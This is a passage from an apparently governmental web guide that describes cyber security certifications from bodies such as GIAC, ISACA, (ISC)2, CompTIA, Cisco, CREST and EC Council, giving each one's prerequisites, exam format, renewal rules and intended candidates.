knowledge of network and host monitoring, traffic analysis, and intrusion detection. Certificate holders are qualified to configure and monitor intrusion detection systems, and to analyze network traffic.</li> <li><strong>GIAC Certified Incident Handler</strong> (GCIH) demonstrates oneās ability to detect, respond, and resolve computer security incidents using a wide range of essential security skills. An individual with GCIH certification has a solid understanding of common cyber-attack techniques and how to defend against them.</li> </ul><p>A complete list of cyber security certifications offered by GIAC can be found in <a href="#tab7">Section 5.7</a>.</p> </details><details class="group" id="wb-auto-27"><summary><h3>2.8 Information Systems Audit and Control Association (ISACA)</h3> </summary><p>ISACA, formerly known as the Information Systems Audit and Control Association, is an international professional association focused on IT governance. It has more than 140,000 members and professionals holding ISACA certifications in 180 countries. Its 200+ chapters provide members with training, and networking and resource sharing opportunities.</p> <p>Candidates must pass written exams to obtain any of ISACAās professional certifications, all of which are valid for three years. To maintain certification, credential holders are required to obtain at least 120 continuing professional education credits over the three-year period, and pay an annual membership fee, or re-take the exam. ISACA Cyber Security Certifications include the following:</p> <ul><li><strong>The Certified Information Security Manager</strong> (CISM) credential is aimed at leaders of Cyber Security teams, IT professionals responsible for managing, developing, and overseeing information security systems in enterprise-level applications, or for developing best organizational security practices. In addition to the written exam, candidates must have at least 5 years of security experience and submit a written application.</li> <li><strong>Certified in Risk and Information Systems Control</strong> (CRISC) certification demonstrates the ability to identify, evaluate, and respond to IT risks. Candidates must have 3 years of professional-level risk management and control experience and perform the tasks of at least two CRISC domains. For this certification, education is not an acceptable substitute for work experience.</li> <li><strong>Cyber Security Nexus Practitioner</strong> (CSXāP) recognizes individuals who can act as first responders for security incidents. Created in 2015, tests oneās ability to perform globally validated cyber security covering the five core functions of the NIST Cyber Security Framework; Identify, Protect, Detect, Respond, and Recover. To obtain certification, candidates must pass a 4-hour performance-based exam consisting of simulated security incidents. At the end of the 3-year certification period, holders must take the latest version of the exam to recertify.</li> </ul><p>A complete list of cyber security certifications offered by ISACA can be found in <a href="#tab9">Section 5.9</a>.</p> </details><details class="group" id="wb-auto-28"><summary><h3>2.9 International Information System Security Certification Consortium (ISC2)</h3> </summary><p>The International Information Systems Security Certification Consortium, or (ISC)2, is a non-profit member organization that provides support to members with credentials, resources, and leadership to address cyber, information, software, and infrastructure security. It is a large IT Security organization, with more than 140,000 members worldwide, almost 6,000 of which are Canadian.</p> <p>(ISC)2 offers one of the most popular cyber security certifications:</p> <ul><li><strong>Certified Information Systems Security Professional</strong> (CISSP) designation is often required for the most in-demand cyber security jobs and is considered the āgold standardā of security certifications. Requirements for this advanced level certification include a minimum of 5 years of experience in at least two of (ICS)2ās eight common body of knowledge domains, or 4 years of experience and a college degree or approved credentials. Candidates are also required to pass a 3-hour written exam. Re-certification is required every 3 years. To recertify, candidates must earn 120 continuing professional education credits within the three-year cycle and pay an annual fee.</li> </ul><p>A complete list of cyber security certifications offered by (ISC)2 can be found in <a href="#tab8">Section 5.8</a>.</p> </details><details class="group" id="wb-auto-29"><summary><h3>2.10 itSM Solutions</h3> </summary><p>Built around NIST Cyber Security Framework, itSM Solutions certifications validate that cybersecurity professionals have the baseline skills to design, build, test and manage a cybersecurity program using the NIST Cybersecurity Framework.</p> <ul><li><strong>NCSF Foundations</strong>: For executives, business and IT professionals who need a basic understanding of NCSF to perform their jobs</li> <li><strong>NCSF Practitioner</strong>: Teaches how to build and design a technology focused cyber security program and risk management program. Gives you a deeper understanding of the NCSF and how to adapt and operationalize it.</li> </ul><p>A complete list of cyber security certifications offered by itSM Solutions can be found in <a href="#tab10">Section 5.10</a>.</p> </details><details class="group" id="wb-auto-30"><summary><h3>2.11 McAffee Institute</h3> </summary><p>McAfee Institute offers several industry-recognized board certifications in the areas of cyber intelligence and investigations, digital forensics, and cryptocurrency investigations. Certificate holders come from some of the top law enforcement and government agencies like the U.S Air Force and Army, Federal Bureau of Investigation (FBI) and the New York Police Department (NYPD).</p> <ul><li><strong>Certified Cyber Intelligence Professional</strong> (CCIP) certification was developed in conjunction with the Department of Homeland Securityā National Cyber Security Workforce Framework. Certification demonstrates that an individual can identify persons of interest, conduct timely cyber investigations, and prosecute cyber criminals. Candidates must hold a bachelorās degree or higher, and three years of experience in investigations, IT, fraud, law enforcement, forensics, criminal justice, law, and loss prevention.</li> </ul><p>A complete list of cyber security certifications offered by McAfee Institute can be found in <a href="#tab11">Section 5.11</a>.</p> </details><details class="group" id="wb-auto-31"><summary><h3>2.12 Offensive Security</h3> </summary><p>Offensive Security is an international company that provides security counselling and training for technology companies, including practical performance-based certification programs, virtual lab access, and open-source projects.</p> <ul><li><strong>Offensive Security Certified Professional</strong> (OSCP) certification is considered one of the hardest to obtain due to its difficult exam. Candidates are required to successfully attack and penetrate live machines in a safe, lab environment over a 24-hour period. Because of its hands-on nature, it is intended for penetration testers with strong technical and ethical hacking backgrounds. Prior to attempting the exam, candidates must complete the Penetration Testing training course offered by Offensive Security. Obtaining the certificate also qualifies the recipient for 40 (ISC)2 continuing education credits. Unlike many of the other cyber security certifications, the OSCP certificate never expires.</li> <li><strong>Security Operations and Defensive Analysis</strong> (OSDA) certification is tailored for IT professionals such as security operations centre analysts, threat intelligence analysts and others who are involved in safeguarding an organization’s IT environment. This certification encompasses several critical areas, including incident response, where candidates learn to effectively detect, respond to, and recover from security incidents. It also covers threat intelligence, which involves understanding and applying knowledge of emerging threats, and security monitoring, focusing on identifying suspicious activities through network and log analysis. Additionally, the certification delves into vulnerability management and cyber defense techniques, equipping professionals with the skills to assess, mitigate vulnerabilities, and implement robust defense strategies against cyber threats. You will also gain confidence configuring and monitoring a SIEM for active network attacks and be able to manually inspect logs to recognize normal and abnormal activity. The certification process requires participants to complete a comprehensive training course followed by a rigorous examination that tests both their theoretical knowledge and practical skills in these areas. Prior to attempting this certification, learners must have successfully completed Linux, Windows and Networks Basics courses from Offensive Security.</li> </ul><p>A complete list of cyber security certifications offered by Offensive Security can be found in <a href="#tab12">Section 5.12</a>.</p> </details><details class="group"><summary><h3>2.13 PECB</h3> </summary><p>PECB is a certification body that provides education and certification under International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) 17024 (conformity assessment: general requirements for bodies operating certifications of individuals) on a wide variety of disciplines including information security and cloud security. They have a global network of distributers, trainers, and certified individuals in more than 150 countries. PECB is accredited by the International Accreditation Service (IAS) and the United Kingdom Accreditation Service (UKAS).</p> <ul><li><strong>Certified Lead Ethical Hacker</strong> credential demonstrates that you can lawfully assess the security of your organizationās systems and find their vulnerabilities.</li> </ul><p>A complete list of cyber security certifications offered by PECB can be found in <a href="#tab13">Section 5.13</a>.</p> </details><details class="group" id="wb-auto-32"><summary><h3>2.14 SECO Institute</h3> </summary><p><strong>Security & Continuity Institute</strong> (SECO) is a European institute that offers high-level security and continuity certifications. The SECO certification program consists of seven different certification tracks, each focusing on a specific field of expertise, such as IT Security, Data Privacy, and Ethical Hacking. Tracks starts at the Foundation level, followed by Practitioner and Expert levels. Candidates can then apply for Certified Officer level certifications which are the highest achievable qualification in each certification track.</p> <ul><li><strong>Ethical Hacking Foundation</strong> (SāEHF) is an entry-level certification for professionals seeking to enter the career field. Certificate holders understand the fundamentals of ethical hacking and can perform basic penetration testing. While there are no prerequisites, it is recommended that candidates have a basic understanding of Linux.</li> <li><strong>Ethical Hacking Practitioner</strong> (SāEHP) is aimed at professionals who already have solid knowledge of ethical hacking basics. It is recommended that candidates obtain S-EHF certification first. Obtaining certification demonstrates that an individual has a full understanding of the penetration testing process and is familiar with common penetration testing techniques.</li> </ul><p>A complete list of cyber security certifications offered by SECO can be found in <a href="#tab14">Section 5.14</a>.</p> </details></div> </section><div class="pull-right mrgn-tp-md small text-muted mrgn-bttm-md"><a href="#wb-tphp" title="Return to Top of page">Top of page</a></div> <section><h2 id="C">3.0 Cyber Credentials Collaborative</h2> <p>Cyber Credentials Collaborative (C3) was created in 2011 to promote the benefits of certifications in the skills development of information security professionals around the world. C3 provides awareness of and advocacy for vendor-neutral credentials in information security, privacy, and other IT disciplines. By providing a forum for members to collaborate on issues of shared concern, C3 aims to advance IT careers, better prepare the workforce, and ensure that IT certifications are developed to meet the needs of government, private organizations, and educational institutions.</p> <p>The following listed certification bodies are all members of C3:</p> <ul><li>(ISC)2</li> <li>CertNexus</li> <li>CompTIA</li> <li>Global Information Assurance Certification</li> <li>ISACA</li> </ul></section><section><h2 id="D">4.0 Cyber Security certification listings and descriptions</h2> <p>The tables below offer a more fulsome list of the different cyber security certifications available to individuals, in alphabetical order <sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup>.</p> <p>Prior to attempting a certification exam, candidates can purchase training (in-class, online, or self-paced courses) and other exam preparation materials, such as practice exams, through the vendors and training providers listed in the last column. Some vendors also offer course bundles that include exam fees. To find out more about certification training options and providers, please visit the certification body website.</p> <div class="btn-group mrgn-tp-sm mrgn-bttm-md"><button class="btn btn-primary wb-toggle" data-toggle="{"selector": "details", "print": "on", "stateOn": "on", "stateOff": "off", "parent": "#section2"}" type="button">Expand | collapse all</button></div> <!– END TOGGLE Expand | collapse–> <div id="section2"> <details class="grouped" id="wb-auto-4"><summary><h3 id="tab1">4.1 CertNexus</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified First Responder (CFR)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of analyzing threats, designing secure computing and network environments, proactively defecting networks and responding to/investigating cyber security incidents</li> <li>DoD approved (Directive 8140)</li> <li>Candidates should have 3-5 years of experience working in a computing environment protecting critical information systems before, during, and after an incident</li> <li>Exam consists of 100 multiple choice questions</li> <li>Valid for 3 years</li> <li>2 options for re-certification: <ul><li>Take the most recent version of the exam</li> <li>Earn 90 continuing educated credits within the 3 years and paying annual fees</li> </ul></li> </ul><h5>Intended candidates</h5> <ul><li>System Administrators</li> <li>Network Administrators</li> <li>Incident Responders</li> <li>Cyber Crime Investigators</li> <li>IT Auditors</li> <li>Security Analysts</li> <li>Network Analysts</li> <li>Information Systems Security Engineers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified IoT Security Practitioner (CIoTSP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge, skills, and ability to secure network environments for IoT devices, analyze vulnerabilities and determine reasonable controls against threats and effectively monitor IoT devices and respond to incidents</li> <li>Candidates should have a fundamental understanding of IoT ecosystems</li> <li>Exam consists of 100 multiple choice questions</li> </ul><h5>Intended candidates</h5> <ul><li>Network Administrators</li> <li>Software Development Engineer</li> <li>Solution Architects</li> <li>Cyber Security Analysts</li> <li>Web Developers</li> <li>Cloud Engineers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Cyber Secure Coder (CSC)</h4> </div> <h5>Certification overview</h5> <ul><li>Demonstrates that a candidate has learned about the vulnerabilities that undermine security, identification and remediation of those vulnerabilities, and strategies for dealing with security defects.</li> <li>Candidates should have some programming experience (developing desktop, mobile, web, or cloud applications)</li> <li>Exam consists of 80 multiple choice questions</li> <li>Valid for 3 years</li> </ul><h5>Intended candidates</h5> <ul><li>Lead Developers</li> <li>Junior Programmers</li> <li>Application Testers</li> <li>QA Testers</li> <li>Software Designers</li> <li>Software Architects</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">CyberSafe</h4> </div> <h5>Certification overview</h5> <ul><li>Validates that a candidate can identify the most common risks involved in using mobile and cloud technologies, and to protect themselves and their organizations from cyber threats</li> <li>No prerequisites for exam but candidates should have experience with basic technology (computers, smartphones, email, internet etc.)</li> <li>Exam is only 10 questions and has no time limit</li> </ul><h5>Intended candidates</h5> <ul><li>Non-technical computer end-users</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">IRBIZ micro credential</h4> </div> <h5>Certification overview</h5> <ul><li>Certifies that a candidate has the necessary skills to assess and respond to security threats, and operation a system and network security analysis platform.</li> <li>Candidates should have a general understanding of cyber security</li> <li>Exam consists of 10 multiple choice and true/false questions</li> <li>Valid for 3 years</li> </ul><h5>Intended candidates</h5> <ul><li>IT leaders and Executives responsible for incident response legislation compliance</li> </ul></details><details class="grouped" id="wb-auto-5"><summary><h3 id="tab2">4.2 Cisco Systems</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Cisco Certified CyberOps Associate</h4> </div> <h5>Certification overview</h5> <ul><li>Certification prepares candidates to begin working with associate-level cybersecurity analysts within security operations centers</li> <li>No prerequisites</li> <li>DoD approved (Directive 8570)</li> <li>Candidates must pass two 2 exams to receive certification</li> <li>Valid for 3 years</li> <li>Recertification requires taking a recertification exam, or completing learning activities and 30 earning continuing education credits</li> </ul><h5>Intended candidates</h5> <ul><li>Cyber Security Analysts</li> <li>Security Operations Centre Team members</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Cisco Certified CyberOps Professional</h4> </div> <h5>Certification overview</h5> <ul><li>New certification introduced in 2021</li> <li>Validates a candidateās knowledge of cloud computing security, risk management, and threat intelligence analysis</li> <li>No prerequisites</li> <li>Valid for 3 years</li> <li>Recertification requires advancing to the next level of certification, earning continuing education credits, or a combination of both</li> </ul><h5>Intended candidates</h5> <ul><li>Information Security Analysts</li> <li>Incident Responders</li> <li>Incident Managers</li> <li>Network Engineers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Cisco Certified Internetwork Expert (CCIE) Security</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of security infrastructure including network security, cloud security, content security, endpoint protection and detection, secure network access, visibility and enforcements</li> <li>No perquisites</li> <li>It is recommended that candidates have 5-7 years of experience of designing, deploying, operating and optimizing security technologies and solutions</li> <li>Certification requires passing a qualifying exam and an 8-hour hands-on lab exam</li> <li>Valid for 3 years</li> <li>Recertification requires advancing to the next level of certification, earning continuing education credits, or a combination of both</li> </ul><h5>Intended candidates</h5> <ul><li>Senior networking professionals with at least 5-7 years of experience</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Cisco Certified Network Professional (CCNP) Security</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of enterprise infrastructure, virtualization, assurance, security, and automation</li> <li>No perquisites</li> <li>It is recommended that candidates have 3-5 years of experience implementing security solutions</li> <li>Certification requires passing a core exam and a concentration exam.</li> <li>Valid for 3 years</li> <li>Recertification requires advancing to the next level of certification, earning continuing education credits, or a combination of both</li> </ul><h5>Intended candidates</h5> <ul><li>Professionals with 3-5 years of implementing security solutions</li> <li>Network engineers</li> <li>System engineers</li> <li>Network technicians</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Cisco Certified Support Technician (CCST) Cybersecurity</h4> </div> <h5>Certification overview</h5> <ul><li>New certification introduced in 2023</li> <li>Entry-level certification</li> <li>No prerequisites</li> <li>Validates a candidateās skills and knowledge of entry-level cyber security concepts and topics including security principles, network security and endpoint security concepts, vulnerability assessment and risk management, and incident handling</li> <li>Certification does not expire and there is no need to recertify</li> </ul><h5>Intended candidates</h5> <ul><li>Late secondary and postsecondary students</li> <li>Students in technical schools</li> <li>Entry-level IT or networking professionals</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Cisco Certified Support Technician (CCST) Networking</h4> </div> <h5>Certification overview</h5> <ul><li>New certification introduced in 2023</li> <li>Entry-level certification</li> <li>No prerequisites</li> <li>Validates a candidateās skills and knowledge of entry-level networking concepts and topics including how networks operate, including the devices, media, and protocols that enable network communications</li> <li>Certification does not expire and there is no need to recertify</li> </ul><h5>Intended candidates</h5> <ul><li>Late secondary and postsecondary students</li> <li>Students in technical schools</li> <li>Entry-level IT or networking professionals</li> </ul></details><details class="grouped" id="wb-auto-6"><summary><h3 id="tab3">4.3 CompTIA</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Advanced Security Practitioner (CASP+)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced level certification</li> <li>The only performance-based certifications for practitioners rather than managers, at the advanced level of cyber security</li> <li>Validates advanced-level competency in risk management, enterprise security operations and architecture, research and collaboration, and integration of enterprise security</li> <li>DoD approved (Directive 8140/8570)</li> <li>Candidates require 10 years of experience in IT administration; 5 of which are hands-on technical security experience</li> <li>Exam consists of 90 multiple choice and performance-based questions</li> <li>Valid for 3 years</li> <li>Renewal requires obtaining 75 continuing education credits during the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Architect</li> <li>Technical Lead Analyst</li> <li>Security Engineer</li> <li>Application Security Engineer</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Cyber Security Analyst (CySA+)</h4> </div> <h5>Certification overview</h5> <ul><li>Intermediate level cybersecurity analyst certification</li> <li>The most up to date security analyst certification covering advanced persistent threats in a post-2014 cyber security environment.</li> <li>Validates a candidateās expertise in security analytics, intrusion detection, and response</li> <li>Candidates should have 3-4 years of information security or related experience, and Network+ or Security+ certification, or equivalent knowledge</li> <li>Approved by US Department of Defence</li> <li>Exam consists of 85 multiple choice and performance-based questions</li> <li>Valid for 3 years</li> <li>Renewal requires obtaining 60 continuing education credits during the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>IT Security Analyst</li> <li>Security Operations Centre Analyst</li> <li>Cyber Security Specialist</li> <li>Threat Intelligence Analyst</li> <li>Security Engineer</li> <li>Cyber Security Analyst</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Network+</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge and skills in designing and implementing functional networks</li> <li>Prerequisites are A+ certification and 9-12 months of networking experience</li> <li>Good to have for developing a career in IT infrastructure (troubleshooting, configuring, managing networks)</li> <li>Exam consists of 90 multiple choice and performance-based questions</li> <li>Valid for 3 years</li> <li>Renewal requires obtaining 30 continuing education credits during the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Entry-level positions</li> <li>Junior Network Administrator</li> <li>Computer technician</li> <li>Junior System Engineer</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">PenTest+</h4> </div> <h5>Certification overview</h5> <ul><li>Intermediate level certification</li> <li>Validates a candidateās ability and knowledge to test devices in new environments, like cloud or mobile, as well as traditional desktops and servers</li> <li>Candidates should have 3-4 years of hands-on information security or related experience</li> <li>Exam consists of a maximum of 85 multiple choice and performance-based questions</li> <li>Renewal requires obtaining 60 continuing education credits during the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Tester</li> <li>Vulnerability Tester</li> <li>Security Analyst</li> <li>Network Security Operations</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Security+</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level certification</li> <li>Validates baseline cyber security skills needed to perform core security functions</li> <li>Certificate holders are experts in threat management, network access control, and security infrastructure.</li> <li>Candidates must have 2 years of experience in network security and obtained Network+ certification</li> <li>Valid for 3 years</li> <li>Renewal requires obtaining 50 continuing education credits during the 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Systems Administrator</li> <li>Network Administrator</li> <li>Security Administrator</li> <li>Penetration Tester</li> <li>Security Engineer</li> </ul></details><details class="grouped" id="wb-auto-7"><summary><h3 id="tab4">4.4 Council for Registered Ethical Security Testers (CREST)</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Infrastructure Tester</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to assess a network for flaws and vulnerabilities at the network and operating system layer</li> <li>Exam consists of a multiple-choice written portion, and two 6hr hands-on practical components</li> <li>Valid for 3 years</li> <li>To recertify, candidates must re-write the exam</li> </ul><h5>Intended candidates</h5> <ul><li>System Administrators</li> <li>Penetration Testers</li> <li>Information Security Managers</li> <li>Incident Handlers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Web Application Tester</h4> </div> <h5>Certification overview</h5> <ul><li>Assesses a candidateās ability to find vulnerabilities in bespoke web applications.</li> <li>Exam consists of a multiple-choice written portion, and two 6hr hands-on practical components</li> <li>Valid for 3 years</li> <li>To recertify, candidates must re-write the exam</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Testers</li> <li>Ethical Hackers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">CREST Certified Wireless Specialist (CCWS)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge and skills in performing traditional wireless security reviews, RFID, Bluetooth and other wireless technologies</li> <li>Prerequisite is successful completion of one of the core CREST certification exams</li> <li>2-part exam: 120 multiple choice questions and practical tasks</li> <li>Valid for 3 years</li> <li>To recertify, candidates must re-write the exam</li> </ul><h5>Intended candidates</h5> <ul><li>Senior professionals</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Practitioner Security Analyst (CPSA)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level certification</li> <li>Validates a candidateās knowledge in assessing operating systems and common network services at a basic level</li> <li>Candidates must demonstrate that they have the knowledge to perform basic infrastructure and web application vulnerability scans and interpret the results to locate security vulnerabilities.</li> <li>Exam consists of multiple-choice questions</li> <li>Valid for 3 years</li> <li>To recertify, candidates must re-write the exam</li> </ul><h5>Intended candidates</h5> <ul><li>System Administrators</li> <li>Penetration Testers</li> <li>Information Security Managers</li> <li>Incident Handlers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Registered Penetration Tester (CRT)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to carry out basic vulnerability assessment and penetration testing tasks.</li> <li>During the exam, candidates are required to find known vulnerabilities across common network, application and database technologies; includes a multiple-choice section</li> <li>Pre-requisite is the CPSA certification</li> <li>Valid for 3 years</li> <li>To recertify, candidates must re-write the exam</li> </ul><h5>Intended candidates</h5> <ul><li>System Administrators</li> <li>Penetration Testers</li> <li>Information Security Managers</li> <li>Incident Handlers</li> </ul></details><details class="grouped" id="wb-auto-8"><summary><h3 id="tab5">4.5 Certified Wireless Network Professions (CWNP)</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Wireless Network Expert (CWNE)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Less than 200 CWNE certificate holders in the world</li> <li>Validates that a candidate has mastered all the relevant to administer, install, configure, troubleshoot and design wireless networks, and has a deep understanding of protocol analysis, intrusion detection and prevention.</li> <li>Candidates are required to have 3-years of experience related to Wi-Fi networks</li> <li>Application requirements include endorsement from 3 people and written submissions (essays and publications)</li> <li>Candidates must pass 4 exams and complete commercial WLAN deployments</li> <li>Valid for 3 years</li> <li>Renewal requires paying a renewal fee and obtaining 60 continuing education credits over a 3-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals in senior WLAN positions</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Wireless Security Professional (CWSP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to assess the vulnerabilities of a network, help prevent attacks before they happen, perform WLAN security audits, and implement compliance monitoring solutions.</li> <li>Candidate must have already obtained Certified Wireless Network Administrator (CWNA) certification</li> <li>Exam consists of 60 multiple choice questions</li> <li>Valid for 3 years</li> <li>Recertification requires having valid CWNA certification and passing the current version of the exam or pass the CWNE exam.</li> </ul><h5>Intended candidates</h5> <ul><li>IT Networking Professionals</li> </ul></details><details class="grouped" id="wb-auto-9"><summary><h3 id="tab6">4.6 EC Council</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Application Security Engineer (CASE)</h4> </div> <h5>Certification overview</h5> <ul><li>Two streams: JAVA and .NET</li> <li>Validates that a candidate has the critical security skills and knowledge required throughout a typical software development life cycle (SDLC), focusing on the importance of the implementation of secure methodologies and practices in todayās insecure operating environment</li> <li>Candidates seeking certification without official training are required to have 2 years of work experience in information security and must apply for exam eligibility</li> <li>Valid for 3 years</li> <li>Exams consist of 50 multiple choice questions</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals responsible for developing, testing, managing, or protecting wide area of applications</li> <li>Developers who want to become Application Security Engineers, Analysts or Testers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Chief Information Security Officer (CCISO)</h4> </div> <h5>Certification overview</h5> <ul><li>Program recognizes the real-world experience necessary to succeed at the highest executive levels of Information Security</li> <li>CCISO program is aimed at producing top-level information security executives</li> <li>Candidates seeking certification without official training are required to have at least 5 years of work experience in each of the 5 CCISO domains and must apply for exam eligibility</li> <li>Candidates attending official training require 5 years of work experience in at least 3 of the CCISO domains</li> <li>Exam consists of 150 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Chief Information Security Officers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Cloud Security Engineer (CCSE)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to create and implement security policies to safeguard cloud infrastructure and applications</li> <li>Program provides both vendor-neutral and vendor-specific cloud security concepts</li> <li>Candidates seeking certification without official training are required to have at least 2 years of work experience information security and must apply for exam eligibility</li> <li>Exam consists of 125 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Cloud Analysts</li> <li>Cyber Security Analysts</li> <li>Network Security Administrators</li> <li>Cloud Administrators and Engineers</li> <li>Network and Cloud Management Operations Professionals</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Cybersecurity Technician (CCT)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level cyber security credential for individuals starting a career in cyber security or IT</li> <li>Validates a candidateās hands-on technical skills</li> <li>No prerequisites</li> <li>Exam consists of 60 multiple choice questions and 10 practical scenarios</li> <li>Valid for 3 years</li> <li>CCT is not part of the EC-Council Continuing Education (ECE) scheme. To recertify, a candidate must take the exam again</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals seeking entry-level cyber security or information security roles</li> <li>Cyber Security technicians</li> <li>Network Engineers and Administrators</li> <li>IT Support Specialists and Managers</li> <li>Network Technicians and Coordinators</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Ethical Hacker (CEH)Ā – ANSI</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level credential</li> <li>Validates that a candidate knows how to look for weaknesses and vulnerabilities in target systems and use the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner to assess the security posture of a target system</li> <li>Candidates seeking certification without official training are required to have 2 years of work experience in information security and must apply for exam eligibility</li> <li>This credential certifies individuals in the specific network security discipline of ethical hacking from a vendor-neutral perspective</li> <li>Exam consists of 125 questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Information Security Officers</li> <li>Information Assurance Security Officers, Managers, Engineers, or Specialists</li> <li>Site Administrators</li> <li>Information Security Auditors</li> <li>Risk/Threat/Vulnerability Analysts</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Ethical Hacker (CEH)Ā – Master</h4> </div> <h5>Certification overview</h5> <ul><li>Candidate holds both the ANSI and Practical CEH certifications</li> <li>Meets GCHQ Certified Training standard</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Security Officers</li> <li>IT Auditors</li> <li>Site Administrators</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Ethical Hacker (CEH)Ā – Practical</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of ethical hacking techniques such as threat vector identification, network scanning, operating system (OS) detection, vulnerability analysis, system hacking, web application hacking, etc.</li> <li>No perquisites, but this certification is usually the next step after obtaining the CEH ANSI</li> <li>6-hour exam features 20 case studies</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Information Security Analysts or Administrators</li> <li>Information Assurance Security Officers, Managers, Engineers, or Specialists</li> <li>Risk/Threat/Vulnerability Analysts</li> <li>System Administrators</li> <li>Network Administrators or Engineers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Network Defender (CND)Ā – ANSI</h4> </div> <h5>Certification overview</h5> <ul><li>Demonstrates that a candidate has the required expertise to protect, detect, and respond to threats on the network</li> <li>Candidates seeking certification without official training are required to have 2 years of work experience in IT security and must apply for exam eligibility</li> <li>Exam consists of 100 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay 